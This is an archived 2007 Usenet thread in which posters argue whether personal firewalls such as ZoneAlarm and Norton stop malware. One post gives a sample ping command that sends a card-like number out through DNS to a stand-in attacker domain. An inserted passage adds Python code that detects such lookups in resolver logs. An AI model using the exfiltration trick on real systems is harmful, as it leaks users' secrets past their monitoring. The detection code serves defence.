Norton vs Zone Alarm firewalls - Firewalls



Thread: Norton vs Zone Alarm firewalls

  1. Re: Norton vs Zone Alarm firewalls

    On Tue, 27 Nov 2007 14:24:21 +0100 (CET), Ansgar -59cobalt- Wiechers wrote:

    > In comp.security.firewalls Kayman wrote:
    >> On Tue, 27 Nov 2007 06:43:39 GMT, HEMI-Powered wrote:
    >>> Kayman added these comments in the current discussion du jour
    >>>> "People think that putting one AV engine after another is somehow
    >>>> defense in depth. They think that if one engine doesn't catch the
    >>>> worm, the other will catch it," he said. "You haven't decreased your
    >>>> attack surface; you've increased it because every AV engine has
    >>>> bugs"
    >>>
    >>> I don't think anyone thinks that having more than one true AV utility
    >>> running at a time is a good idea. But, what I listed running all the
    >>> time, eTrust Pest Patrol, commercial Zone Alarm, and NAV 2006 are all
    >>> intended to do different things in different ways. And, running
    >>> Ad-Aware and Spy Bot Search & Destroy as separate utilities
    >>> periodically do yet another security-related purpose. So, I see no
    >>> conflicts here.

    >>
    >> Conflict(s) is/are not the issue; The OS may appear working smoothly.
    >> But installing anti-whatever applications has made your OS more
    >> vulnerable to attacks.

    >
    > Not true. Conflicts between two on-access scanners are a very real issue
    > and are indeed the main argument against installing concurring scanners.


    Yes of course! Utilizing more than one (1) real-time anti-virus scanning
    engine most likely will cause conflicts; I didn't mean to suggest
    otherwise. I was trying to emphasise that additional software such as
    on-demand av/a-s and other anti-whatever apps. are not causing noticeable
    conflicts per se. Sorry for confusion.

    > Also, installing applications does not necessarily make an OS more
    > vulnerable. The OS only becomes more vulnerable if some application has
    > an exploitable bug. Of course installing additional software does
    > increase the chance of that happening, but it doesn't automagically make
    > the OS (more) vulnerable.
    >
    > For example: you can easily run two or more on-demand virus scanners
    > without a single problem, because they're running as simple userspace
    > applications (and thus won't affect each other), and only run with the
    > privileges of the user initiating the scan.
    >
    > However, that doesn't mean that it'd be okay to install arbitrary AV
    > software, because several of them have issues aside from what I
    > mentioned above.
    >
    > cu
    > 59cobalt


  2. Re: Norton vs Zone Alarm firewalls

    Unknown wrote:
    > "Ansgar -59cobalt- Wiechers" wrote:
    >> In comp.security.firewalls Kayman wrote:
    >>> Conflict(s) is/are not the issue; The OS may appear working
    >>> smoothly. But installing anti-whatever applications has made your OS
    >>> more vulnerable to attacks.

    >>
    >> Not true. Conflicts between two on-access scanners are a very real
    >> issue and are indeed the main argument against installing concurring
    >> scanners. Also, installing applications does not necessarily make an
    >> OS more vulnerable. The OS only becomes more vulnerable if some
    >> application has an exploitable bug. Of course installing additional
    >> software does increase the chance of that happening, but it doesn't
    >> automagically make the OS (more) vulnerable.
    >>
    >> For example: you can easily run two or more on-demand virus scanners
    >> without a single problem, because they're running as simple userspace
    >> applications (and thus won't affect each other), and only run with
    >> the privileges of the user initiating the scan.
    >>
    >> However, that doesn't mean that it'd be okay to install arbitrary AV
    >> software, because several of them have issues aside from what I
    >> mentioned above.

    >
    > I use absolutely no virus programs whatsoever, have never had a virus
    > or malware. Can you tell me why?


    You may want to explain how exactly that is supposed to relate to what I
    wrote.

    cu
    59cobalt
    --
    "If a software developer ever believes a rootkit is a necessary part of
    their architecture they should go back and re-architect their solution."
    --Mark Russinovich

  3. Re: Norton vs Zone Alarm firewalls

    In comp.security.firewalls RalfG wrote:
    > "Gerald Vogt" wrote:
    >> RalfG wrote:
    >>> firewall may have the ability to block -any- application from
    >>> sending email without explicit approval. Monitoring outbound traffic
    >>> also entails

    >>
    >> Still, any application can send email without explicit approval if it
    >> really wants to. That's the point which is usually not mentioned.

    >
    > In your preferred setup nothing prevents emails from being sent. With
    > an appropriate firewall the firewall can block emails from being sent
    > without user intervention.


    The user's mail client is allowed to send mail. %OTHER_PROGRAM% utilizes
    the user's mail client to send mail. How does the firewall prevent that?

    No, trying to intercept IPC and then let the user decide is not an
    option, because that kind of decision is *way* over a normal user's
    head.

    >>> differentiating the legitimate processes from suspicious ones or
    >>> spoofs. All firewalls are not equal, but if the firewall is doing
    >>> the job well it's not enough for a process to pretend to be
    >>> "iexplore.exe" in order to pass the firewall, it has to be
    >>> c:\program files\internet explorer\iexplore.exe, with additional
    >>> identifying information, be it a specific version number, CRC etc.
    >>> etc..

    >>
    >> And what keeps the malware from using the original IE to send out its
    >> data?

    >
    > In your setup nothing, with many firewalls nothing as well, however
    > there are firewalls which do monitor all processes that try to start
    > other processes.


    There's exactly no need at all to do that. Software Restriction Policies
    already allow to define which programs may or may not be executed.

    >>> Viruses aren't smart, they're all constrained to operating within
    >>> specific program parameters. Some are more cleverly written than
    >>> others but the vast majority have already been beaten.

    >>
    >> Yes. But that's all. A single little bit cleverer malware sends out
    >> your credit card number through DNS. Your firewall does not help. It
    >> does not recognize it. You still need more effective means to protect
    >> your data which no security suite can provide.

    >
    > You're basing your argument on a hypothetical malware and deficient AV
    > and firewall apps. Sorry, that strawman logic doesn't work. One of the
    > reasons for monitoring outbound traffic is precisely to stop
    > unrecognized processes from making connections, either to the internet
    > or to other nodes on a LAN.


    Instead of restricting the communication of unrecognized processes you
    want to prevent unrecognized processes from being started in the first
    place. That's what AV software and SRP do.

    > Firewall X might do this better than Firewall Y, Firewall Z might not
    > do it at all. Y may not be as good a firewall as X but it is still
    > better than Z, and even Z is better than nothing at all.


    Wrong, because this neglects the existence of exploitable bugs and
    design flaws in the firewall software as well as the possibility of
    intelligent malware.

    >>> Anyway this thread seems to be missing the point. It's analogous to
    >>> saying that we shouldn't bother using crosswalks or crossing at the
    >>> lights because it is always possible that some idiot driver might
    >>> ignore the signals and run us down anyway. One side (anti-security)
    >>> says avoid the problem by never crossing a street, the other side
    >>> (pro-security) says use due caution and

    >>
    >> No. That is the wrong analogy. No one ever said you can never cross
    >> the street.
    >>
    >> You say you have to install security firewall, i.e. you have to cross
    >> the street with the security installed, i.e. at the lights. You must
    >> not cross the street at any other place (i.e. without security)
    >> because you will be killed, i.e. it is impossible to cross the
    >> street at any other place except at the lights.

    >
    > I never suggested certainty. The whole computer security issue is
    > about probabilities.


    No. Computer security is about reliability. Which may very well be based
    on probabilities, but only if you have some hard numbers. Which numbers
    are the probabilities you're talking about based on?

    > There is a greater probability of being hit by traffic if you don't
    > use the crosswalks just as there is a greater probability of falling
    > victim to malware if you don't use security software.


    Pointless, unless you are able to quantify that.

    cu
    59cobalt
    --
    "If a software developer ever believes a rootkit is a necessary part of
    their architecture they should go back and re-architect their solution."
    --Mark Russinovich

  4. Re: Norton vs Zone Alarm firewalls

    RalfG wrote:
    > "Gerald Vogt" wrote in message
    > news:ex5$zCVMIHA.1164@TK2MSFTNGP02.phx.gbl...
    >> RalfG wrote:
    >>> It doesn't need to be a virus. I did encounter that one time when
    >>> accessing a web page unexpectedly triggered OE and the firewall blocked
    >>> it. A

    >> Which means again you went to that web page to start with. It was your
    >> action which brought you there.

    >
    > Normal usage of the computer for browsing, yes. Staying off of the internet
    > is almost certainly the best way to avoid trouble but that's just a tad self
    > defeating.


    I'll never understand why many people also jump to the "stay off the
    internet". No one said so. It is your conclusion that it is inevitable
    to come to such "bad" web pages. And that is simply not true. You can
    browse the internet and still avoid most of those pages.

    >>> firewall may have the ability to block -any- application from sending
    >>> email without explicit approval. Monitoring outbound traffic also entails

    >> Still, any application can send email without explicit approval if it
    >> really wants to. That's the point which is usually not mentioned.

    >
    > In your preferred setup nothing prevents emails from being sent. With an
    > appropriate firewall
    > the firewall can block emails from being sent without user intervention.


    Yes. The firewall may be able to block emails from being sent with OE
    without user intervention.

    It cannot prevent some malware from putting some mails into the outbox
    which are sent out the next time the user sends something out.

    And it cannot prevent some malware sending out e-mail or other data
    bypassing the firewall. If you want to get something out you'll get it
    out even with the firewall in place.

    >>> differentiating the legitimate processes from suspicious ones or spoofs.
    >>> All firewalls are not equal, but if the firewall is doing the job well
    >>> it's not enough for a process to pretend to be "iexplore.exe" in order to
    >>> pass the firewall, it has to be c:\program files\internet
    >>> explorer\iexplore.exe, with additional identifying information, be it a
    >>> specific version number, CRC etc. etc..

    >> And what keeps the malware from using the original IE to send out its data?

    >
    > In your setup nothing, with many firewalls nothing as well, however there
    > are firewalls
    > which do monitor all processes that try to start other processes.


    Many people have a browser running at all times. You don't need to start
    a process. You just have to make the other process do what you want.
    That's not so awfully difficult.

    >>> Viruses aren't smart, they're all constrained to operating within
    >>> specific program parameters. Some are more cleverly written than others
    >>> but the vast majority have already been beaten.

    >> Yes. But that's all. A single little bit cleverer malware sends out your
    >> credit card number through DNS. Your firewall does not help. It does not
    >> recognize it. You still need more effective means to protect your data
    >> which no security suite can provide.

    >
    > You're basing your argument on a hypothetical malware and deficient AV and
    > firewall apps. Sorry, that strawman logic doesn't work. One of the reasons
    > for monitoring outbound traffic is precisely to stop unrecognized processes
    > from making connections, either to the internet or to other nodes on a LAN.


    Again. IE, OE, and other installed applications on your computer are not
    unrecognized processes. ping for example is a standard application. You
    can simply enter

    ping VISA12341234123412340108RalfGGG.badguy.example.com

    And here goes your credit card... You'll never notice. At the same time
    you run another process which you let get caught by the firewall to make
    the user think it is all safe and he can continue...

    I don't have to use unrecognized processes to send data.

    And even "unrecognized processes" can trick the firewall.


    > Firewall X might do this better than Firewall Y, Firewall Z might not do it
    > at all. Y may not be as good a firewall as X but it is still better than Z,
    > and even Z is better than nothing at all.


    Good at blocking software you have installed and use to communicate: yes.

    Good at blocking malware effectively: no.

    >> You say you have to install security firewall, i.e. you have to cross the
    >> street with the security installed, i.e. at the lights. You must not cross
    >> the street at any other place (i.e. without security) because you will be
    >> killed, i.e. it is impossible to cross the street at any other place
    >> except at the lights.

    >
    > I never suggested certainty. The whole computer security issue is about
    > probabilities. There is a greater probability of being hit by traffic if you
    > don't use the crosswalks just as there is a greater probability of falling
    > victim to malware if you don't use security software.


    This is just plain wrong. I am far safer if I open my eyes and make
    sure that it is safe to cross the street than to rely on traffic lights.

    Thus, why would you tell everybody to use the lights and it is
    absolutely essential to use the lights when there is a far more
    effective and safer method?

    >> you from being killed if all you do is to cross the street at the lights
    >> and never looking to the right or left. If you just start to walk when
    >> it's green you'll be eventually killed. There are a lot of nice drivers
    >> who stop at their red light but eventually you'll meet the one who does
    >> not.
    >>
    >> The alternative is not to rely on the lights. Don't trust the lights. The
    >> effective security is to switch on your brain and protect yourself looking
    >> to the left and right and making sure yourself it is safe to cross the
    >> street at this time and at this place. This effectively

    >
    > You just described using due caution.


    Which is far more effective security.

    >> That's the correct analogy if you want to use the "lights". No one ever
    >> said you cannot cross the street. On the contrary. (I already know how you
    >> will now adjust your analogy but...)

    >
    > There's no need to adjust my analogy. You haven't yet made a compelling
    > argument in favour of your position.. and I doubt that accident statistics
    > will support your contentions either.


    You started that analogy. I did not adjust it. You described it wrong.

    The goal was to cross the street.

    You use security software as an aid just like traffic lights are an aid for
    that.

    I say you don't need the lights. You don't need the security software.

    It is useless to discuss your analogy if you want the analogy to be that
    not using security software equals not crossing the street. Because you
    mix the aim with the tool which is supposed to help.

    >>> cross with the lights. I use a firewall mainly to keep
    >>> unauthorised -people- out of my PC, AV and AS software to keep out or
    >>> kill malicious software.

    >> Anything that comes on to your computer first of all got there because of
    >> your action, i.e. your "invitation". But none of the security suites
    >> really deals with this fact nor

    >
    > Blaming the victim?


    Yes. If a person refuses to learn about security. If a person thinks it
    only has to install a software suite to protect your computer. If a
    person thinks with security suite in place everything is done which one
    can possibly do to have security. If someone wants to dig in the dirt
    he'll get dirty. If you are concerned about the security of your
    computer and data you'll learn rules how to keep secure.

    Gerald
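
The DNS lookup described in this post is made by a program the host firewall already trusts, so it has to be caught in the resolver's query log instead. The following is an added example, not part of the original thread: a small Python check that flags queried names with card-length digit runs or long high-entropy labels. The log format, sample lines and thresholds are assumptions constructed for illustration.

```python
import math
import re
from collections import Counter

# Constructed resolver query-log lines: "<client-ip> <queried-name>".
# The third name is the one quoted in the post; the rest are made up.
SAMPLE_LOG = """\
10.0.0.5 www.example.org
10.0.0.5 cdn-12.static.example.org
10.0.0.7 VISA12341234123412340108RalfGGG.badguy.example.com
10.0.0.7 a9f3k2q8z7x1m4c6v0b5n2l8j3h7g1d4s6.t.example.com
10.0.0.5 mail.example.net
"""

# Thresholds are assumptions for this example; tune them on your own traffic.
DIGIT_RUN = re.compile(r"\d{13,}")   # payment card numbers are 13-19 digits
MIN_LABEL_LEN = 24                   # ordinary host labels are rarely this long
MIN_ENTROPY = 4.0                    # bits per character


def shannon_entropy(text):
    """Shannon entropy of a string in bits per character."""
    counts = Counter(text)
    total = len(text)
    return -sum(n / total * math.log2(n / total) for n in counts.values())


def label_findings(qname):
    """Return the reasons a queried name looks like it carries data."""
    reasons = []
    # DNS names are case-insensitive, so normalise before inspecting labels.
    for label in qname.rstrip(".").lower().split("."):
        if DIGIT_RUN.search(label) and "long-digit-run" not in reasons:
            reasons.append("long-digit-run")
        if (len(label) >= MIN_LABEL_LEN
                and shannon_entropy(label) >= MIN_ENTROPY
                and "high-entropy-label" not in reasons):
            reasons.append("high-entropy-label")
    return reasons


def scan_log(log_text):
    """Return a list of (client, qname, reasons) for every flagged line."""
    flagged = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue  # skip blank or malformed lines
        client, qname = parts
        reasons = label_findings(qname)
        if reasons:
            flagged.append((client, qname, reasons))
    return flagged


if __name__ == "__main__":
    for client, qname, reasons in scan_log(SAMPLE_LOG):
        print(f"{client} {qname} -> {', '.join(reasons)}")
```

The check works on the queried name alone, so it flags the lookup regardless of which local program issued it.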

  5. Re: Norton vs Zone Alarm firewalls

    Yes Gerald, I know I should be kind of ashamed to belong still to the
    species who use ZA to some extent, but:

    >Why again does it happen to so many people that their
    >networking still does not work correctly after they have uninstalled
    >ZoneAlarm? The stupid uninstaller forgot to remove the proxy setting
    >in the internet settings... Hic. It was just not built to be
    >uninstalled.


    You are right, I can confirm it is so.



  6. Re: Norton vs Zone Alarm firewalls

    >I understand that you are trying to be helpful, but I have to disagree with
    >you on the points that you have to reinstall windows to uninstall security
    >software or that running a windows system without av or pfw is a good idea.


    In fact I am very much surprised how kind they all were to you, how
    decent the discussion went on this time.
    When I placed one time a Q abt ZA, I thought I started WW3!



  7. Re: Norton vs Zone Alarm firewalls

    > My Zone Alarm Pro firewall subscription expires in a few days and I
    > recently bought a Norton Internet Security 2008 package that contains a
    > firewall.
    > I currently have the Norton firewall turned off and just use the Zone
    > Alarm Pro firewall.
    > I don't use the Win XP firewall because I heard that it's not a good idea
    > to have several firewall on at the same time.
    > We get internet through a Belkin pre-N wireless router that is supposed to
    > have some sort of firewall built in and that one is turned on.
    > My computer connects to the router with an ethernet cable and my son's
    > computer uses a Belkin N usb wireless adapter. They both have the same
    > current setup I describe regarding firewalls.
    > Can anyone please advise on whether the Zone Alarm Pro firewall is any
    > better than the Norton firewall in my situation?
    > Should I renew the Zone Alarm Pro subscription or uninstall it when it
    > expires and turn on the Norton firewall?
    > Thanks for any advice.


    Specifically with regard to your question I think an important part of the
    answer is which firewall software you are more comfortable with. By that I
    mean which product's interface and features make the most sense? Firewalls
    have many features which can often be configured in multiple ways. The
    more you understand the product the more likely you will configure it
    optimally and get the best protection. Zone Alarm is a good choice if you
    want to be involved. On the other hand, some folks prefer security software
    that requires as little user interaction as possible and the Norton products
    are a good choice in that case because by default they handle a lot of the
    decision making. I'm not familiar with the firewall included in NIS 2008 so
    I can't comment specifically on it, but it did get a very good review at
    pcmag.com. Hope this helps.


  8. Re: Norton vs Zone Alarm firewalls

    "Kayman" wrote in message
    news:1vmjr84gxn0np$.tn0yxpzuscii.dlg@40tude.net...
    >
    > It is important that administrators follow the rule of least privilege.


    Definitely.




  9. Re: Norton vs Zone Alarm firewalls

    "Ansgar -59cobalt- Wiechers" wrote in message
    news:fika9uUka3L1@news.in-ulm.de...
    > In comp.security.firewalls RalfG wrote:
    >> "Gerald Vogt" wrote:
    >>> RalfG wrote:

    >>
    >> One of the
    >> reasons for monitoring outbound traffic is precisely to stop
    >> unrecognized processes from making connections, either to the internet
    >> or to other nodes on a LAN.

    >
    > Instead of restricting the communication of unrecognized processes you
    > want to prevent unrecognized processes from being started in the first
    > place. That's what AV software and SRP do.



    I think you are both correct. Doing both makes it more difficult for
    malicious software to work. Doing one without the other can be a
    vulnerability.


    Note: I am sorry that I had to add the other newsgroups back into the list
    of recipients of this, but I am unable to send to just
    comp.security.firewalls.




  10. Re: Norton vs Zone Alarm firewalls

    "Gerald Vogt" wrote in message
    news:eN$4UbhMIHA.4476@TK2MSFTNGP06.phx.gbl...
    >
    > It cannot prevent some malware from putting some mails into the outbox
    > which are sent out the next time the user sends something out.


    Outlook Express won't send anything without some user involvement. In the
    past, it was possible for unauthorized software to spread themselves in the
    manner you describe but now Microsoft does not allow it. Certainly there is
    potential for sophisticated software to bypass such things, but if it were
    as easy as you say, we would sure hear about it.

    Windows, at least prior to Vista, is surprisingly vulnerable to software
    that is allowed to execute in a system. It is so vulnerable that it is
    nearly impossible to make a system totally safe from software running in a
    system. There are many ways for software to inject a DLL or other code into
    another process. Good antivirus software will catch most of those, and
    detection of injection is a critical way to catch most malicious software
    and that is how antivirus software might also catch many valid utility
    software.

    Regardless, use of OE in the manner you describe is not as easy as you
    indicate.




  11. Re: Norton vs Zone Alarm firewalls

    On Sun, 25 Nov 2007 16:19:26 -0500, "Poprivet`"
    wrote:



    > "Integrate" means to essentially become a part of.


    Which is exactly what happens.



    >I can't answer that one because I don't have any issues with it. I use
    >ZoneAlarm Pro after using the free version for a long time, and never had
    >issues with it.


    Malware you'd allow to run wouldn't have issues with it either.



    >I simply believe that inconsistencies and misinformation are bad, very bad,
    >in a public place because too many newbies will hook onto the one they like
    >the best and remember that instead of the more accurate assessments.


    Agreed. Now please tell that to vendors of so called "security
    software".



    >Not really. Within minutes, the "noise" of the internet is likely to
    >discover one or more of your open ports and start testing them.


    Now, you're the one spreading misinformation here. This is only true
    prior to XP SP2 unless you turned on the firewall or, even better,
    shut down your network services.

    >One can literally become infected with a virus or spyware within minutes of
    >accessing the internet without some sort of protection in place, especially
    >considering all of the "noise" looking for you are covert in nature and
    >aren't going to announce themselves. You'll find very, very few
    >recommendations to EVER connect to the 'net without some sort of protection
    >installed.


    I had a W2K machine directly connected to the net for years, without
    any "protection" and without any problems, so you are obviously wrong.



    >There's a little hype involved, but if you'd like to see what's happening on
    >your machine and who can see what in and on it, visit grc.com and let them
    >run a few tests on your ports.


    Referring to grc.com does not improve your argument. Quite the contrary.

    >In my current configuration, I'm fully "stealthed",


    Stealth is hype and doesn't add anything in terms of security.

    >meaning no one on the 'net can see me in any way.


    meaning you don't have a clue...

    >That's the target to shoot for. It's a free service, and pretty good. There are
    >others also but I like grc.


    And you were the one warning against misinformation...


